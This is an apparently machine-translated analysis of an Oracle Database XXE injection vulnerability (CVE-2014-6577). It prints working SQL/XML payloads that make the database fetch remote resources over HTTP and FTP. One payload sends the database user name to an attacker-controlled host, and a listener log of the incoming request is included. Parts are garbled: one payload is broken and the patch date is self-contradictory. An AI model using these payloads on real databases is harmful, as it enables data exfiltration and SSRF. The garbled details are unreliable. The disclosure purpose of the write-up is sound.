Analysis of Oracle Database XXE Injection Vulnerability (CVE-2014-6577)

Analysis of Oracle Database XXE Injection Vulnerability (CVE-2014-6577)
Vulnerability description the XML Parser module of the Oracle database is vulnerable to XML External Entity (XXE) injection.
Affected Versions: 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2
Required permissions: CREATE SESSION)

Due to the security features of the XML parser in Oracle, the external mode is resolved but not parsed.
This prevents XXE injection attacks, such as reading local files on the remote database server.
However, attackers can send well-developed SQL queries to trigger the XML Parser and trick the server into connecting to a remote resource through HTTP or FTP.
This may cause data leakage due to out-of-band channels, port scanning on a remote internal system, server-side Request Forgery (SSRF) attacks, or DoS attacks ).
Vulnerable URI handler:
Http: ftp: 0x01

Oracle's XML Parser can be triggered by calling the extractvalue () function for xml objects. The following is a simple example. This example uses a simple XXE injection payload to construct a query statement:

select extractvalue(xmltype('<!ENTITY xxe SYSTEM "etc/passwd">]>'|| '&' ||'xxe;'),'/l') from dual;

Executing the preceding query statement will cause the following error:

ORA-31001: Invalid resource handle or path name "/etc/passwd"ORA-06512: at "SYS.XMLTYPE", line 310ORA-06512: at line 131001. 00000 - "Invalid resource handle or path name \"%s\""*Cause: An invalid resource handle or path name was passed tothe XDB hierarchical resolver.*Action: Pass a valid resouce handle or path name to the hierarchicalresolver.

This is because the file URI handler is converted into an XDB library path.

0x02

However, changing to an http uri handler will cause another problem. The sample query code is as follows:

select extractvalue(xmltype('<!ENTITY xxe SYSTEM "http://IP/test">]>'|| '&' ||'xxe;'),'/l') from dual;

The database server error is as follows:

ORA-31020: The operation is not allowed, Reason: For security reasons, ftp and http access over XDB repository is not allowed on server sideORA-06512: at "SYS.XMLTYPE", line 310ORA-06512: at line 131020. 00000 - "The operation is not allowed, Reason: %s"*Cause: The operation attempted is not allowed*Action: See reason and change to a valid operation.

This error indicates that the FTP and http uri processing programs may be accepted by the XML parser. Note that the preceding query statement does not send any HTTP request to the attacker's system.

0x03

Let's take a look at another XXE injection payload. This reference is a parameter entity, not a document entity:

select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://IP/test"> %remote; %param1;]>'),'/l') from dual;

When you execute this query statement, the database server produces the same error (ORA-31020) as above ). However, this time the server was successfully tricked into submitting an HTTP request for the resource "test. The following are the HTTP logs on the attacker Server:

ncat -lvp 80Ncat: Version 6.25 ( http://nmap.org/ncat )Ncat: Listening on :::80Ncat: Listening on 0.0.0.0:80Ncat: Connection from DB_IP.Ncat: Connection from DB_IP:27320.GET /test HTTP/1.0Host: DB_IPContent-Type: text/plain; charset=utf-8

Traditionally, in order to force the server to send HTTP requests to external resources, attackers need certain permissions to access the UTL_HTTP packet. Because extractvalue () is available to all database users, XXE injection brings about another method to trigger out-of-band HTTP requests, and the implementation of this method does not require the aforementioned permissions.

0x04

The ftp uri handler (FTP :) can also be used to trigger the XML Parser of Oracle. The following is an example of a query statement. In this example, the user name of the database is sent as the FTP User name:

select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "ftp://'||user||':bar@IP/test"> %remote; %param1;]>'),'/l') from dual;

The Database Server prompts an error (note that the error code is different from the above because the provided credential cannot be used to log on to the remote FTP Server) as follows:

ORA-31011: XML parsing failedORA-19202: Error occurred in XML processingLPX-00202: could not open "ftp://SYSTEM:bar@IP/test" (error 402)Error at line 1ORA-06512: at "SYS.XMLTYPE", line 310ORA-06512: at line 131011. 00000 - "XML parsing failed"*Cause: XML parser returned an error while trying to parse the document.*Action: Check if the document to be parsed is valid.

We can see that the database user name is included in the FTP traffic sent to the attacker server as the FTP User name:

Conclusion

Currently, this vulnerability has been reported to Oracle, where Oracle released a vulnerability patch on March 13, January 20, 2015.